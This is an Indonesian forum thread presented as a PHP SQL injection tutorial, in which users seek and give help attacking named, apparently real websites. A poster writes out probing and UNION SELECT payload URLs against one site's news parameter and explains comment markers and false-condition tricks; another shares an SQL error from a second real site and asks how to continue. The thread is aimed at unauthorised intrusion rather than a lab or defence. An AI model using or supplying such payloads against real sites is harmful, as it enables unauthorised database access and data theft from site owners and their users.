[TUTORIAL] SQL Injection Pada PHP

[apriliana]

gimana caranya ngerubah tabel admin = 0x41444d494e
dan colum NAME menjadi = 0x2b soalnya bingung nih
maaf klw pertanyaannya terlalu mendeteil maklum newbie..
hehehehe...

maksudnya bagaimana ya?
klo untuk merubah nama tabel di database dengan perintah alter table klo ga salah
CMIIW

[ji_bog]

gimana caranya ngerubah tabel admin = 0x41444d494e
dan colum NAME menjadi = 0x2b soalnya bingung nih
maaf klw pertanyaannya terlalu mendeteil maklum newbie..
hehehehe...

untuk merubahnya menggunakan tool nah toolnya bisa di cari di google
keyword : hex converter

[Broo]

butuh pencerahan donk bwt para master...

klo yg ini kira2 bs gk pke SqLi http://zonetz.com/?q=dn&ref=&nwsid=67'

msi kebingungan nehh....

[apriliana]

butuh pencerahan donk bwt para master...

klo yg ini kira2 bs gk pke SqLi http://zonetz.com/?q=dn&ref=&nwsid=67'

msi kebingungan nehh....

mau jawban lgsg ato model hint neh?

hint nya:
1. cari tanda untuk ngasih komentar
2.cari agar hasil dr scripntny bernilai false..
3.baru cari magic numbernya...
mgkn kata2ku susah dipahami..

nih deh hasilnya silakan dipelajari perintah berikut

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67+and+1=2+union+all+select+1,2,3,4,5,6--

[_angga punya_]

om april jelasin donk arti yg ini
1.cari tanda untuk ngasih komentar
2.cari agar hasil dr scripntny bernilai false..
3.baru cari magic numbernya.
kan biar lbh paham
yah klo g keberatan

[apriliana]

om april jelasin donk arti yg ini
1.cari tanda untuk ngasih komentar
2.cari agar hasil dr scripntny bernilai false..
3.baru cari magic numbernya.
kan biar lbh paham
yah klo g keberatan

>>>>untuk tanda komentar
dalam php ada 2 tanda komentar yaitu -- dan /*
dalam contoh di atas

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67

diganti menjadi

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67/*

maka script web akan eror,tapi kalau diganti menjadi

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67--

maka script akan berjalan normal,apa artinya?itu berarti tanda komentar yg dipake di web itu adalah --

>>>>>cara agar nilai script web bernilai false adalah
kalu kita jalankan perintah

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67--

maka akan tetap menghasilkan nilai true.untuk melihat magic numbernya maka kita harus membuat agar perintah tersebut bernilai false.karena dgn bernilai false maka perintah tersebut tidak akan menampilkan data2 nya.bahasa gampangnya tampilan di web menjadi blank.
ada bnyk cara agar perintah tersebut menjadi bernilai false misal dgn

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=-67--
atau bisa jg dengan
http://zonetz.com/?q=dn&ref=&nwsid=67+and+1=2--

caranya tidak semua sama,tapi tergantung kreatifitas untuk mencarinya

>>>mencari magic number
sudah bnyk tutor mencari magic number di forum ini..dicari sendiri dolo yeee

tambah bingung kan akui ngomong apa ehhehe

[_angga punya_]

seep dah om mantab bnr pnjelasannya
alhamdulillah ngerti dri beberapa tutornya
tks ya om

[apriliana]

buset dah dipanggil om..........

akika cucok begindang dipanggil om.....

[ninewhite]

kak, cara konversi ke hexadecimal_sqlgimana ya?

[komporgas]

dear bang ji_bong
ane mau nanya, setelah langkah ke 2, hasilnya harus seperti ini ya...

Code: Select all

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

... :circle: :circle: :circle:

karna saya nemunya kayak gni

Code: Select all

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 4

di situs ini : http://www.iau.org.tw/news_detail.php?Id=526%27

:pusing: :pusing: :pusing:

mohon pencerahannya ya bang... :love: :love: